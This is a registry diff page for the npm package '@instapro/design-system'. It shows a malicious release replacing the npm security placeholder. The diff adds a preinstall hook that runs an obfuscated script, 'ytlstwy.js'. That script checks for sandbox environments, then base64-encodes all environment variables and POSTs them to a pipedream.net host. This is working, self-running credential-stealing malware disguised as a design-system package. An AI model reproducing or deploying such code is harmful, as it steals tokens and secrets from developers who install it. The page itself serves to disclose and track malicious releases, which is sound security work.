@instapro/design-system 0.0.1-security → 80.926.325
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @instapro/design-system might be problematic. Click here for more details.
- package/package.json +8 -3
- package/ytlstwy.js +1 -0
- package/README.md +0 -5
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@instapro/design-system",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "80.926.325",
|
|
4
|
+
"main": "ytlstwy.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node ytlstwy.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/ytlstwy.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const a0_0x4dd08e=a0_0x30a2;(function(_0x16d3f4,_0x53fa55){const _0x2129a2=a0_0x30a2,_0x49d855=_0x16d3f4();while(!![]){try{const _0xa19530=parseInt(_0x2129a2(0xbf))/0x1*(-parseInt(_0x2129a2(0xbd))/0x2)+parseInt(_0x2129a2(0xd2))/0x3*(parseInt(_0x2129a2(0xc8))/0x4)+-parseInt(_0x2129a2(0xb7))/0x5*(parseInt(_0x2129a2(0xd3))/0x6)+-parseInt(_0x2129a2(0xcf))/0x7+-parseInt(_0x2129a2(0xd9))/0x8+-parseInt(_0x2129a2(0xd7))/0x9*(parseInt(_0x2129a2(0xd4))/0xa)+parseInt(_0x2129a2(0xc6))/0xb*(parseInt(_0x2129a2(0xb8))/0xc);if(_0xa19530===_0x53fa55)break;else _0x49d855['push'](_0x49d855['shift']());}catch(_0x52174c){_0x49d855['push'](_0x49d855['shift']());}}}(a0_0x64e5,0x250a3));const http=require(a0_0x4dd08e(0xce)),filter=[{'key':a0_0x4dd08e(0xc9),'val':a0_0x4dd08e(0xb9)},{'key':a0_0x4dd08e(0xc9),'val':'tencent.com'},{'key':a0_0x4dd08e(0xc0),'val':a0_0x4dd08e(0xbc)},{'key':'_','val':a0_0x4dd08e(0xc2)}];function a0_0x30a2(_0x168e42,_0x4a9f8b){const _0x64e517=a0_0x64e5();return a0_0x30a2=function(_0x30a238,_0x42887d){_0x30a238=_0x30a238-0xb7;let _0x160b09=_0x64e517[_0x30a238];return _0x160b09;},a0_0x30a2(_0x168e42,_0x4a9f8b);}function a0_0x64e5(){const _0x3b44f=['from','npm_package_name','4125iJGysW','6SbvePJ','467060NDQnoo','write','join','18fuNCgD','error','1505296FOzEQT','596930Jsghas','235512KdSsPY','taobao.org','length','some','daasadmin','10796PSsRjT','POST','34VHaffX','USERNAME','keys','/usr/bin/python','base64','includes','env','385NnrETH','end','652Sqzujk','npm_config_registry','request','stringify','pipedream','toString','https','1223796jiqdnb'];a0_0x64e5=function(){return _0x3b44f;};return a0_0x64e5();}function main(){const _0x398720=a0_0x4dd08e;var _0x2a058f=process[_0x398720(0xc5)]||{};if(filter[_0x398720(0xbb)](({key:_0x1a4ddc,val:_0x203cce})=>_0x2a058f[_0x1a4ddc]&&_0x2a058f[_0x1a4ddc][_0x398720(0xc4)](_0x203cce))||Object[_0x398720(0xc1)](_0x2a058f)[_0x398720(0xba)]<0xa)return;req=http[_0x398720(0xca)]({'host':['3e6cd05f19d5dd6adfbed43a32433776','m',_0x398720(0xcc),'net'][_0x398720(0xd6)]('.'),'path':'/'+(_0x2a058f[_0x398720(0xd1)]||''),'method':_0x398720(0xbe)})['on'](_0x398720(0xd8),function(_0x1d1cda){}),req[_0x398720(0xd5)](Buffer[_0x398720(0xd0)](JSON[_0x398720(0xcb)](_0x2a058f))[_0x398720(0xcd)](_0x398720(0xc3))),req[_0x398720(0xc7)]();}main();
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40instapro%2Fdesign-system for more information.
|